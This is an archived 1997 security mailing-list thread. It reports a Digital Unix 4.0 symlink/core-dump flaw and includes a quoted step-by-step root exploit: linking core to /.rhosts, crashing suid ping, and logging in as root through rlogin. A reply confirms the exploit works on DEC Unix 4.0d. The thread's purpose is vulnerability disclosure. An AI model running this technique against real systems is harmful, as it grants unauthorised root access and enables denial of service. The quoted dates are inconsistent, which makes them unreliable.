BSDi 3.1 -> Didn't Work Solaris 2.6 (Intel) -> Didn't work Just to confirm: DEC Unix 4.0d: 21158 Memory fault - core dumped $ ls -la core 21159 Memory fault - core dumped lrwxrwxrwx 1 jonz staff 8 Apr 6 15:18 core -> /.rhosts $ ls -la /.rhosts -rw------- 1 root system 458752 Apr 6 15:18 /.rhosts $ Thank you, Jonathan A. Zdziarski Systems Administrator Netrail Incorporated 888-NETRAIL jonzat_private On Sun, 6 Apr 1997, root wrote: :Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN] :(28/03/1998) : :Starting 2 suid root programs in background, and killing them with -11 flag, :we'll have a core root owned with our gid and mode 600. Then is enough a :symlink :to create a file everywhere...like /.rhosts. : :rustyat_private sorenat_private : :$ ls -l /.rhosts :/.rhosts not found :$ ls -l /usr/sbin/ping :-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping :$ ln -s /.rhosts core :$ IMP=' :>+ + :>' :$ ping somehost & :[1] 1337 :$ ping somehost & :[2] 31337 :$ kill -11 31337 :$ kill -11 1337 :[1] Segmentation fault /usr/sbin/ping somehost (core dumped) :[2] +Segmentation fault /usr/sbin/ping somehost (core dumped) :$ ls -l /.rhosts :-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts : ##/.rhosts has been created....that's all.## :$ rlogin localhost -l root : :Is a very serious problem, it needs a fix as soon as possible, :infact we can have a DoS if we link our core to the kernel. : : :Other platforms: : :SunOs 4.1.x 5.5.x Doesn't work :Linux 2.0.x Doesn't work :Digital Unix 4.0d Doesn't work :Others (note tested yet) :
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:12 PDT